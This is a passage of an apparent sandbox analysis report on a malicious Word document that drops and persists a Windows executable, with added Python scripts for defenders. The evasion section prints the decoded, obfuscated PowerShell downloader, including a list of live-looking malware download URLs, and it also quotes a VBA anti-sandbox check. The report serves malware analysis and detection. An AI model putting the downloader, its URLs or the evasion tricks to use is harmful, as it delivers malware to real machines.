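The process list above is flat, with duplicated "unknown"-parent entries, so rebuilding the actual chain (Word -> WMI -> PowerShell -> dropped EXE -> self-respawn with a random token -> copy in System32 -> self-respawn again) is the first triage step. The following Python is an added example, not part of the Joe Sandbox report and not vendor tooling: it parses the report's own process-creation entries (normalised to "Source: <parent> | Process created: <image> <arguments>"), decodes the `-EncodedCommand` payload, and flags the patterns that make this chain recognisable. Two facts it relies on: PowerShell accepts any unambiguous prefix of `-EncodedCommand` (`-e`, `-ec`, `-enc`, `-encod`, ...), which is why the sample's `-encod` spelling still works and why a detection that only matches the full parameter name misses it; and the sample re-executes itself with a `--<8 hex digits>` argument both from the user directory and from its System32 copy. Because the report redacts the real encoded command, the block substitutes a constructed, harmless stand-in payload.

```python
"""Rebuild the infection chain from this report's 'Process created' entries.

Added example: not part of the Joe Sandbox report and not vendor tooling.
REPORT_LINES are the report's own process-creation entries, normalised to
'Source: <parent> | Process created: <image> <arguments>'. The base64 payload
handed to powershell.exe is a constructed stand-in, because the report redacts
the real -encod argument.
"""
import base64
import re
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

# Constructed stand-in for the redacted payload, encoded the way -EncodedCommand
# expects it (UTF-16LE, then base64).
STAND_IN_SCRIPT = "Write-Output 'stand-in payload'"
STAND_IN_ENCODED = base64.b64encode(STAND_IN_SCRIPT.encode("utf-16-le")).decode("ascii")

REPORT_LINES: List[str] = [
    r"Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -encod " + STAND_IN_ENCODED,
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\982.exe 'C:\Users\user\982.exe'",
    r"Source: C:\Users\user\982.exe | Process created: C:\Users\user\982.exe 'C:\Users\user\982.exe'",
    r"Source: C:\Users\user\982.exe | Process created: C:\Users\user\982.exe --4e722ada",
    r"Source: C:\Windows\System32\sortedwatched.exe | Process created: C:\Windows\System32\sortedwatched.exe C:\Windows\system32\sortedwatched.exe",
    r"Source: C:\Windows\System32\sortedwatched.exe | Process created: C:\Windows\System32\sortedwatched.exe --2a75e385",
]

LINE_RE = re.compile(r"^Source: (?P<parent>.+?) \| Process created: (?P<image>\S+)(?: (?P<args>.*))?$")
# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc,
# -encod, ...), so a detection that only matches the full spelling misses this sample.
_ENC_PREFIXES = "|".join("encodedcommand"[:n] for n in range(14, 0, -1))
ENC_FLAG_RE = re.compile(rf"(?:^|\s)-(?:{_ENC_PREFIXES}|ec)\s+(\S+)", re.IGNORECASE)
SELF_TOKEN_RE = re.compile(r"^--[0-9a-f]{8}$")  # the --4e722ada / --2a75e385 style argument


def decode_encoded_command(args: str) -> Optional[str]:
    """Return the decoded -EncodedCommand script, or None if absent or undecodable."""
    m = ENC_FLAG_RE.search(args)
    if not m:
        return None
    b64 = m.group(1)
    b64 += "=" * (-len(b64) % 4)  # some droppers strip the base64 padding
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def reconstruct(lines: List[str]) -> Tuple[Dict[str, List[str]], List[Tuple[str, str]]]:
    """Return (parent -> [child command lines], findings) for the given report lines."""
    tree: Dict[str, List[str]] = defaultdict(list)
    findings: List[Tuple[str, str]] = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a process-creation entry
        parent, image = m.group("parent"), m.group("image")
        args = (m.group("args") or "").strip()
        tree[parent].append(f"{image} {args}".strip())
        if _basename(image) == "powershell.exe":
            script = decode_encoded_command(args)
            if script is not None:
                findings.append(("encoded-powershell", script))
        if _basename(parent) == "powershell.exe" and image.lower().startswith("c:\\users\\"):
            findings.append(("powershell-runs-user-dir-exe", image))
        if image.lower() == parent.lower() and SELF_TOKEN_RE.match(args):
            where = "system32-copy" if image.lower().startswith("c:\\windows\\system32\\") else "original-drop"
            findings.append(("self-respawn-with-token", f"{_basename(image)} {args} ({where})"))
    return dict(tree), findings


if __name__ == "__main__":
    chain, hits = reconstruct(REPORT_LINES)
    for parent, children in chain.items():
        print(parent)
        for child in children:
            print("   ->", child)
    for kind, detail in hits:
        print(f"[{kind}] {detail}")
```

The self-respawn check deliberately requires the parent and child image paths to be identical and the argument to be exactly a two-dash eight-hex-digit token; loosening either condition (for example, matching any `--` argument) turns normal command-line tools into false positives.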
Uses an in-process (OLE) Automation server
Source: C:\Users\user\982.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Found graphical window changes (likely an installer)
Source: Window Recorder | Window detected: More than 3 window changes detected

Uses Microsoft Silverlight
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
(mscorrc.dll is the .NET Framework CLR resource library; this is another powershell.exe runtime start-up artifact, not evidence of Silverlight use)

Checks if Microsoft Office is installed
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll

Binary contains paths to debug symbols
Source: Binary string: ntdll.pdb | source: 982.exe, 00000004.00000003.293286536.01BC0000.00000004.00000001.sdmp, 982.exe, 00000006.00000003.297891020.01B50000.00000004.00000001.sdmp, sortedwatched.exe, 00000009.00000003.318288495.00CE0000.00000004.00000001.sdmp, sortedwatched.exe, 0000000B.00000003.322801776.00EB0000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdb3 | source: 982.exe, 00000004.00000003.293286536.01BC0000.00000004.00000001.sdmp, 982.exe, 00000006.00000003.297891020.01B50000.00000004.00000001.sdmp, sortedwatched.exe, 00000009.00000003.318288495.00CE0000.00000004.00000001.sdmp, sortedwatched.exe, 0000000B.00000003.322801776.00EB0000.00000004.00000001.sdmp
(the string was found in memory dumps (.sdmp) of the running processes, most likely the debug path of the loaded ntdll.dll rather than a PDB path compiled into the sample)

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\user\982.exe | Unpacked PE file: 5.2.982.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;
Source: C:\Users\user\982.exe | Unpacked PE file: 7.2.982.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;
Source: C:\Windows\System32\sortedwatched.exe | Unpacked PE file: 10.2.sortedwatched.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;
Source: C:\Windows\System32\sortedwatched.exe | Unpacked PE file: 12.2.sortedwatched.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\982.exe | Unpacked PE file: 5.2.982.exe.400000.0.unpack
Source: C:\Users\user\982.exe | Unpacked PE file: 7.2.982.exe.400000.0.unpack
Source: C:\Windows\System32\sortedwatched.exe | Unpacked PE file: 10.2.sortedwatched.exe.400000.0.unpack
Source: C:\Windows\System32\sortedwatched.exe | Unpacked PE file: 12.2.sortedwatched.exe.400000.0.unpack

Contains functionality to dynamically determine API calls
Source: C:\Users\user\982.exe | Code function: 4_2_00432522 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer

Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\982.exe | Code function: 4_2_0042937D push ecx; ret 4_2_00429390
Source: C:\Users\user\982.exe | Code function: 4_2_00429303 push ecx; ret 4_2_00429316
Source: C:\Users\user\982.exe | Code function: 4_2_002D2B12 push eax; ret 4_2_002D2B1C
Source: C:\Users\user\982.exe | Code function: 4_2_002D2CD3 push eax; ret 4_2_002D2CD4
Source: C:\Users\user\982.exe | Code function: 5_2_004123D3 push eax; ret 5_2_004123DD
Source: C:\Users\user\982.exe | Code function: 5_2_00412594 push eax; ret 5_2_00412595
Source: C:\Users\user\982.exe | Code function: 6_2_003F2CD3 push eax; ret 6_2_003F2CD4
Source: C:\Users\user\982.exe | Code function: 6_2_003F2B12 push eax; ret 6_2_003F2B1C
Source: C:\Users\user\982.exe | Code function: 7_2_004123D3 push eax; ret 7_2_004123DD
Source: C:\Users\user\982.exe | Code function: 7_2_00412594 push eax; ret 7_2_00412595
Source: C:\Users\user\982.exe | Code function: 7_1_004123D3 push eax; ret 7_1_004123DD
Source: C:\Users\user\982.exe | Code function: 7_1_00412594 push eax; ret 7_1_00412595
Source: C:\Windows\System32\sortedwatched.exe | Code function: 9_2_003F2CD3 push eax; ret 9_2_003F2CD4
Source: C:\Windows\System32\sortedwatched.exe | Code function: 9_2_003F2B12 push eax; ret 9_2_003F2B1C
Source: C:\Windows\System32\sortedwatched.exe | Code function: 11_2_00502CD3 push eax; ret 11_2_00502CD4
Source: C:\Windows\System32\sortedwatched.exe | Code function: 11_2_00502B12 push eax; ret 11_2_00502B1C
Source: C:\Windows\System32\sortedwatched.exe | Code function: 12_2_004123D3 push eax; ret 12_2_004123DD
Source: C:\Windows\System32\sortedwatched.exe | Code function: 12_2_00412594 push eax; ret 12_2_00412595
Source: C:\Windows\System32\sortedwatched.exe | Code function: 12_1_004123D3 push eax; ret 12_1_004123DD
Source: C:\Windows\System32\sortedwatched.exe | Code function: 12_1_00412594 push eax; ret 12_1_00412595

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Windows\System32\sortedwatched.exe | Executable created and started: C:\Windows\System32\sortedwatched.exe

Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\982.exe

Drops PE files to the user directory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\982.exe

Drops PE files to the windows directory (C:\Windows)
Source: C:\Users\user\982.exe | PE file moved: C:\Windows\System32\sortedwatched.exe
(moving the binary into System32 and installing a service both require administrative rights, which the analysis VM provides; the report does not show what the sample does when it lacks them)

Boot Survival:

Drops PE files to the user root directory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\982.exe

Contains functionality to start windows services
Source: C:\Users\user\982.exe | Code function: 7_2_0040F7A0 OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle

Hooking and other Techniques for Hiding and Protection:

Document contains an embedded VBA macro which may check the recently opened files (possible anti-VM)
Source: Nuovo_documento_2019.09.20.doc | OLE, VBA macro line: If RecentFiles.Count > 3 Then
(Word's RecentFiles collection is nearly empty on a freshly provisioned analysis machine, so requiring more than three entries before proceeding is a cheap sandbox check)

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\982.exe | File opened: C:\Windows\system32\sortedwatched.exe:Zone.Identifier, access: read attributes | delete
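The entry above records the sample opening the `Zone.Identifier` alternate data stream of its System32 copy with delete access, which removes the Mark-of-the-Web that would otherwise record the file's Internet origin (and trigger SmartScreen and Office Protected View for files it is attached to). The following Python is an added example, not part of the report: it parses a `[ZoneTransfer]` stream into its fields and maps `ZoneId` to its zone name, and includes a Windows-only reader that opens the stream through the `file:Zone.Identifier` path syntax. The stream content is a constructed stand-in for what a browser download would have written; the report itself does not reproduce the stream.

```python
"""Parse and classify a Zone.Identifier stream (Mark-of-the-Web).

Added example, not taken from the report. The report only records that
982.exe opened 'sortedwatched.exe:Zone.Identifier' with read-attributes and
delete access; SAMPLE_STREAM is a constructed stand-in for the stream content
a browser download would have left on the original file.
"""
import os
from typing import Dict, Optional

# URLZONE values as written by the Attachment Execution Service.
ZONE_NAMES = {0: "LocalMachine", 1: "LocalIntranet", 2: "TrustedSites", 3: "Internet", 4: "RestrictedSites"}

SAMPLE_STREAM = (  # constructed sample; example.invalid is a reserved test domain
    b"[ZoneTransfer]\r\n"
    b"ZoneId=3\r\n"
    b"ReferrerUrl=https://example.invalid/download\r\n"
    b"HostUrl=https://example.invalid/982.exe\r\n"
)


def parse_zone_identifier(data: bytes) -> Optional[Dict[str, str]]:
    """Return the key/value pairs of a [ZoneTransfer] stream, or None if the data is not one."""
    text = data.decode("utf-8", errors="replace")
    if "[ZoneTransfer]" not in text:
        return None
    fields: Dict[str, str] = {}
    for line in text.splitlines():
        if "=" in line and not line.startswith("["):
            key, value = line.split("=", 1)
            fields[key.strip()] = value.strip()
    return fields


def zone_name(fields: Dict[str, str]) -> str:
    """Human-readable zone for a parsed stream; 'Unknown' when ZoneId is missing or malformed."""
    try:
        return ZONE_NAMES.get(int(fields.get("ZoneId", "")), "Unknown")
    except ValueError:
        return "Unknown"


def read_zone_identifier(path: str) -> Optional[Dict[str, str]]:
    """Read the ADS of an NTFS file (Windows only); None when the stream is absent.

    Absence is exactly what the report shows the sample producing on its
    System32 copy, so a missing stream on a dropped binary is not reassuring.
    """
    if os.name != "nt":
        raise OSError("alternate data streams need NTFS on Windows")
    try:
        with open(path + ":Zone.Identifier", "rb") as fh:
            return parse_zone_identifier(fh.read())
    except FileNotFoundError:
        return None


if __name__ == "__main__":
    parsed = parse_zone_identifier(SAMPLE_STREAM)
    print(parsed, "->", zone_name(parsed))
```

On a live host the same `file:Zone.Identifier` path works with `Get-Content -Stream Zone.Identifier` in PowerShell; the point of reading it programmatically is to check a whole drop directory at once and to keep `HostUrl` and `ReferrerUrl`, which are the download provenance that the delete access in the report destroys.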
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\982.exe | Code function: 4_2_00417380 IsWindowVisible,IsIconic
Source: C:\Users\user\982.exe | Code function: 4_2_0040B948 IsIconic,GetWindowPlacement,GetWindowRect

Disables application error messages (SetErrorMode)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX (85 identical events)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (64 identical events)
Source: C:\Users\user\982.exe | Process information set: NOOPENFILEERRORBOX (2 identical events)
Source: C:\Windows\System32\sortedwatched.exe | Process information set: NOOPENFILEERRORBOX (2 identical events)
(SEM_NOOPENFILEERRORBOX is set by Office and PowerShell in normal operation; only the 982.exe and sortedwatched.exe entries are attributable to the sample)

Malware Analysis System Evasion:

Found evasive API chain (may stop execution after checking mutex)
Source: C:\Windows\System32\sortedwatched.exe | Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess (graph_12-2912)
Source: C:\Users\user\982.exe | Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess (graph_5-2961)
Checks the free space of hard drives
Source: C:\Users\user\982.exe | File volume queried: C:\ FullSizeInformation
Contains functionality to enumerate running services
Source: C:\Users\user\982.exe | Code function 7_2_0040F504: EnumServicesStatusExW,GetLastError,EnumServicesStatusExW,GetTickCount,OpenServiceW,QueryServiceConfig2W,GetLastError,QueryServiceConfig2W,CloseServiceHandle
Source: C:\Windows\System32\sortedwatched.exe | Code function 12_2_0040F504: EnumServicesStatusExW,GetLastError,EnumServicesStatusExW,GetTickCount,OpenServiceW,QueryServiceConfig2W,GetLastError,QueryServiceConfig2W,CloseServiceHandle
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Enumerates the file system
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Found evasive API chain (may stop execution after checking a module file name)
Source: C:\Users\user\982.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep (graph_4-29669)
Found large amount of non-executed APIs
Source: C:\Users\user\982.exe | API coverage: 6.9 %
Source: C:\Users\user\982.exe | API coverage: 6.6 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2920 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\982.exe TID: 3744 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\sortedwatched.exe TID: 3836 | Thread sleep time: -60000s >= -30000s
Contains functionality to query system information
Source: C:\Users\user\982.exe | Code function 4_2_00427ECC: VirtualQuery,GetSystemInfo,GetModuleHandleW,GetProcAddress,VirtualAlloc,VirtualProtect
Program exit points
Source: C:\Users\user\982.exe | API call chain: ExitProcess graph end node (graph_4-29872)
Source: C:\Users\user\982.exe | API call chain: ExitProcess graph end node (graph_5-2880)
Source: C:\Users\user\982.exe | API call chain: ExitProcess graph end node (graph_7-2847)
Source: C:\Windows\System32\sortedwatched.exe | API call chain: ExitProcess graph end node (graph_12-2829)
Source: C:\Windows\System32\sortedwatched.exe | API call chain: ExitProcess graph end node (graph_12-2837)
Queries a list of all running processes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation

Anti Debugging:

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | System information queried: KernelDebuggerInformation
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\982.exe | Code function 4_2_0042E3B3: _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Source: C:\Users\user\982.exe | Code function 4_2_00427ECC: VirtualProtect ?,-00000001,00000104,?
Contains functionality to dynamically determine API calls
Source: C:\Users\user\982.exe | Code function 4_2_00432522: LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer
Contains functionality to read the PEB
Source: C:\Users\user\982.exe | Code function 4_2_00407F70: mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\982.exe | Code function 4_2_002C213F: mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\982.exe | Code function 4_2_002C219F: mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\982.exe | Code function 4_2_002C0467: mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\982.exe | Code function 4_2_002C3743: mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\982.exe | Code function 4_2_002C2C0C: mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\982.exe | Code function 4_2_004F0E18: push dword ptr fs:[00000030h]
Source: C:\Users\user\982.exe | Code function 4_2_00522860: mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\982.exe | Code function 4_2_00522800: mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\982.exe | Code function 5_2_00401E04: mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\982.exe | Code function 5_2_004012CD: mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\982.exe | Code function 6_2_003E2C0C: mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\982.exe | Code function 6_2_003E0467: mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\982.exe | Code function 6_2_003E213F: mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\982.exe | Code function 6_2_003E3743: mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\982.exe | Code function 6_2_003E219F: mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\982.exe | Code function 6_2_00470E18: push dword ptr fs:[00000030h]
Source: C:\Users\user\982.exe | Code function 6_2_00492860: mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\982.exe | Code function 6_2_00492800: mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\982.exe | Code function 7_2_00401E04: mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\982.exe | Code function 7_2_004012CD: mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\982.exe | Code function 7_1_00401E04: mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\982.exe | Code function 7_1_004012CD: mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\sortedwatched.exe | Code function 9_2_003E2C0C: mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\sortedwatched.exe | Code function 9_2_003E0467: mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\sortedwatched.exe | Code function 9_2_003E213F: mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\sortedwatched.exe | Code function 9_2_003E3743: mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\sortedwatched.exe | Code function 9_2_003E219F: mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\sortedwatched.exe | Code function 9_2_00580E18: push dword ptr fs:[00000030h]
Source: C:\Windows\System32\sortedwatched.exe | Code function 9_2_005A2860: mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\sortedwatched.exe | Code function 9_2_005A2800: mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\sortedwatched.exe | Code function 11_2_003F0E18: push dword ptr fs:[00000030h]
Source: C:\Windows\System32\sortedwatched.exe | Code function 11_2_004F0467: mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\sortedwatched.exe | Code function 11_2_004F2C0C: mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\sortedwatched.exe | Code function 11_2_004F3743: mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\sortedwatched.exe | Code function 11_2_004F213F: mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\sortedwatched.exe | Code function 11_2_004F219F: mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\sortedwatched.exe | Code function 11_2_005B2860: mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\sortedwatched.exe | Code function 11_2_005B2800: mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\sortedwatched.exe | Code function 12_2_00401E04: mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\sortedwatched.exe | Code function 12_2_004012CD: mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\sortedwatched.exe | Code function 12_1_00401E04: mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\sortedwatched.exe | Code function 12_1_004012CD: mov eax, dword ptr fs:[00000030h]
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\982.exe | Code function 4_2_004016A0: GetProcessHeap,HeapFree
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Contains functionality to register its own exception handler
Source: C:\Users\user\982.exe | Code function 4_2_0042B721: SetUnhandledExceptionFilter
Source: C:\Users\user\982.exe | Code function 4_2_0042E3B3: _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\982.exe | Code function 4_2_0043146A: __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\982.exe | Code function 4_2_00427DFF: IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

HIPS / PFW / Operating System Protection Evasion:

Encrypted powershell cmdline option found
Source: unknown | Process created (Base64 decoded, truncated in the report): $mHKwRF='JIbnvfoL';$b3aSim4_ = '982';$GvHK2M='n_vPjrp';$QziABB6L=$env:userprofile+'\'+$b3aSim4_+'.exe';$jwt7_N='Z6G6oToS';$z_nf09=.('new-'+'ob'+'ject') nEt.WebClient;$EIpSGwu='https://sabiosdelamor.co/wp-content/VtyEqoElo/@https://www.euroausili.it/wp-content/iIFSXTWmN/@https://opel.km.ua/blogs/3uju_tiowf9i-149/@https://hablabestop.live/rqbe9p/pKkLiuqGj/@https://dogongulong.vn/wp-admin/vaIDeyDj/'."sP`liT"('@');$Xn9Tjqi='W548GPbi';foreach($CiXHiW in $EIpSGwu){try{$z_nf09."d`ow`N`lOADFIle"($CiXHiW, $Qz
Maps a DLL or memory area into another process
Source: C:\Users\user\982.exe | Section loaded: unknown target pid: 3668 protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\982.exe | Thread register set: target process: 3668
Source: C:\Users\user\982.exe | Thread register set: target process: 3600
Source: C:\Windows\System32\sortedwatched.exe | Thread register set: target process: 3704
Source: C:\Windows\System32\sortedwatched.exe | Thread register set: target process: 3780
Sets debug register (to hijack the execution of another thread)
Source: C:\Users\user\982.exe | Thread register set: 3668 775EA4F4
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -encod [encoded command argument not present on the page]

Language, Device and Operating System Detection:

Contains functionality to query locale information (e.g. system language)
Source: C:\Users\user\982.exe | Code function 4_2_00435022: GetLocaleInfoA
Source: C:\Users\user\982.exe | Code function 4_2_0041CEDC: GetLocaleInfoW,__snwprintf_s,LoadLibraryW
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\982.exe | Code function 4_2_004093C0: cpuid
Queries the volume information (name, serial number etc.) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation (5 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation (2 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation (2 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (2 identical entries)
Source: C:\Users\user\982.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\sortedwatched.exe | Queries volume information: C:\ VolumeInformation
Contains functionality to query local / system time
Source: C:\Users\user\982.exe | Code function 4_2_0042C660: GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,RtlQueryPerformanceCounter
Contains functionality to query Windows version
Source: C:\Users\user\982.exe | Code function 4_2_0040B793: _memset,GetVersionExA
Queries the cryptographic machine GUID
Source: C:\Users\user\982.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Behavior Graph

(Rendered graph and legend not recoverable from the page; node labels that survive are listed below.)

Behavior Graph ID: 961422
Sample: Nuovo_documento_2019.09.20.doc
Start date: 20/09/2019
Architecture: WINDOWS
Score: 100
Signatures on the sample node: Antivirus or Machine Learning detection for sample; Multi AV Scanner detection for submitted file; Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros); 3 other signatures
Processes started from the sample node: powershell.exe, sortedwatched.exe, WINWORD.EXE